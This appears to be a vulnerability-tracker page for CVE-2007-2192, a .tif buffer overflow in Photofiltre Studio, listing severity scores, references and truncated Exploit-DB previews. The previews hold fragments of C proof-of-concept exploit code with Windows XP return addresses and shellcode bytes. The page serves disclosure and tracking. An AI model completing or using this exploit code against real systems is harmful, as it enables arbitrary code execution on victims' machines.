CVE-2007-2192
published 2007-04-24CVE-2007-2192: Buffer overflow in Photofiltre Studio 8.1.1 allows user-assisted remote attackers to execute arbitrary code via a crafted .tif file.
PriorityP340critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.19%
93.5th percentile
Buffer overflow in Photofiltre Studio 8.1.1 allows user-assisted remote attackers to execute arbitrary code via a crafted .tif file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| antonio_da_cruz | photofiltre_studio | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PhotoFiltre Studio X - '.tif' Local Buffer Overflow
exploitdb·2010-05-04
CVE-2007-2192 PhotoFiltre Studio X - '.tif' Local Buffer Overflow
PhotoFiltre Studio X - '.tif' Local Buffer Overflow
---
#include
#define fisier FILE
#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define VER "10.3.0"
#define POCNAME "[*]PhotoFiltre Studio X .tif file local buffer overflow poc(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef char i8;
typedef short i16;
typedef int i32;
void gen_random(i8*,const int);
void print(i8*);
i32 mcpy(void*,const void*,i32);
void fwi32(fisier*,i32);
i32 filerr(fisier*);
void error(void);
void filebuild();
unsigned int getFsize(fisier*,i8*);
i32 sizes[]={257,163,217,213,940,29};
typedef struct {
/*Retcodes from MS Windows xp pro sp3
*/
i32 popopret;
i32 jmpbyte;
i32 jmpEBP;
}instr;
i32 main()
{filebuild();
printf("%s\n%s\n",POCNAME,AUTHOR);
print("file done");
getchar();
}
void filebuild() {
/*The logic: overwrite
Exploit-DB
PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow
exploitdb·2007-04-21
CVE-2007-2192 PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow
PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow
---
/********************************************************************************
* *
* Photofiltre Studio v8.1.1 .TIF File Buffer Overflow *
* *
* *
* Photofiltre is vulnerable to an unspecified buffer overflow when processing a *
* crafted .TIF file. *
* This exploit just beeps (useless but incredibly noisy!!). *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
********************************************************************************/
#include "stdio.h"
#include "stdlib.h"
// Beep Shellcode, made by xnull
// Woaw this is very ... Hum try it!
unsigned char beepsp2[] =
"\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC"
"\x77\x7A\x83\x7C" //Address \x77\x7A\x83\x7C = SP2
"\xC7\x44\x24\x04"
"\
No writeups or analysis indexed.
http://osvdb.org/35265http://secunia.com/advisories/24981http://www.securityfocus.com/bid/23582http://www.vupen.com/english/advisories/2007/1490https://exchange.xforce.ibmcloud.com/vulnerabilities/33807https://www.exploit-db.com/exploits/3772http://osvdb.org/35265http://secunia.com/advisories/24981http://www.securityfocus.com/bid/23582http://www.vupen.com/english/advisories/2007/1490https://exchange.xforce.ibmcloud.com/vulnerabilities/33807https://www.exploit-db.com/exploits/3772
2007-04-24
Published